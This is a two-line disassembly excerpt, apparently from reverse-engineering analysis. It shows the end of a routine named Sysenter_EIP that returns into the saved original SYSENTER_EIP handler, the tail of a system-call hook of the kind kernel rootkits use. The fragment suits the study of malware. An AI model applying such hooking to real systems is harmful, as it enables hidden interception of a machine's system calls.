.data:0041EE9C                 retn                    ; pops the saved original SYSENTER_EIP: continue into the real handler
.data:0041EE9C Sysenter_EIP    endp ; sp-analysis failed
